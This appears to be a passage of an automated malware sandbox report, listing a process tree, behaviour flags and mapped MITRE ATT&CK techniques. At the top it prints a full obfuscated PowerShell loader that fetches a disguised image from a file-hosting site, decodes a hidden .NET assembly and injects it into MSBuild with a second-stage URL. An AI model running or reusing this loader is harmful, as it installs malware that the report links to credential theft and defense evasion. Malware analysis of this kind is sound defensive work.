    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRBOSeprEFeRenCE.Tostring()[1,3]+'x'-joIN'')( (('bcjimageUrl'+' = PXfhttps://1017.filemail.com/api/file/get?filekey'+'=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PXf;bcjwebClient = New-Object System.Net.WebClient;bcji'+'m'+'ageBytes = bcjwebClient.DownloadData(bc'+'jimageUrl);bcjimageText = [System.Text.En'+'coding]:'+':UTF8.GetString(bcjimageBytes'+');bcjstartFlag = PXf<<BASE64_START>>P'+'Xf;bcjendFlag = PXf<<BASE64_END>>PXf;bcj'+'startIndex'+' = bcj'+'imageText.IndexOf(bcjstar'+'tFlag);bcjendIndex = bcjimageTex'+'t.IndexOf('+'bcjendFlag'+');bcjstart'+'Index -ge 0 -and bcjendIndex -gt bcjstartIndex;bcjstartIndex += bcjstartFlag.Length;bcjbase64L'+'ength = bcjendIndex - bcjstartIndex;bc'+'jbase64Command = bcjimageText.Substring(bcjstartIndex, b'+'cjbase64Length);bcjbase64Reversed = -join (bcjbase64Command.To'+'CharArra'+'y() pis ForEa'+'ch-Object { '+'bcj_ })[-1..-(bcjbase64Command.Length)];bcjco'+'mmandBytes = [System.Conver'+'t]::FromBase64String(bcjbase64Reversed);bcjloadedAssembly = [System.'+'Re'+'flec'+'tion.Assembly]::Load(bcjcommandBytes);bcjvaiMe'+'thod = [dnlib.IO.Home].Get'+'Method(PXfVAIPXf);bcjvaiMethod.Invoke'+'(bcjnull, @(PXftxt.krowten/ved.2r.39b345302'+'a075b1'+'bc0d45b632eb9ee62-b'+'u'+'p//:sptthPXf, PXfdesativadoPXf, PX'+'fdesativadoPXf, '+'PXfdesativadoPXf, PXfMSBuildPXf, PXfdesativadoPXf, PXfdesativadoPXf,PXfdesativadoPXf,PXfdesativa'+'doPXf,PXfdesativado'+'PXf,PXfdesativadoPXf,PXfdesativadoPXf,PXf1PXf,PXfdesa'+'tivadoPXf));') -rEPlACE([cHAr]80+[cHAr]88+[cHAr]102),[cHAr]39-rEPlACE'bcj',[cHAr]36 -CrepLACe ([cHAr]112+[cHAr]105+[cHAr]115),[cHAr]124))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    PID:6516
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5204

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:1404

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
1⤵
PID:6696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Power Settings

T1653

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

System Time Discovery

T1124

Virtualization/Sandbox Evasion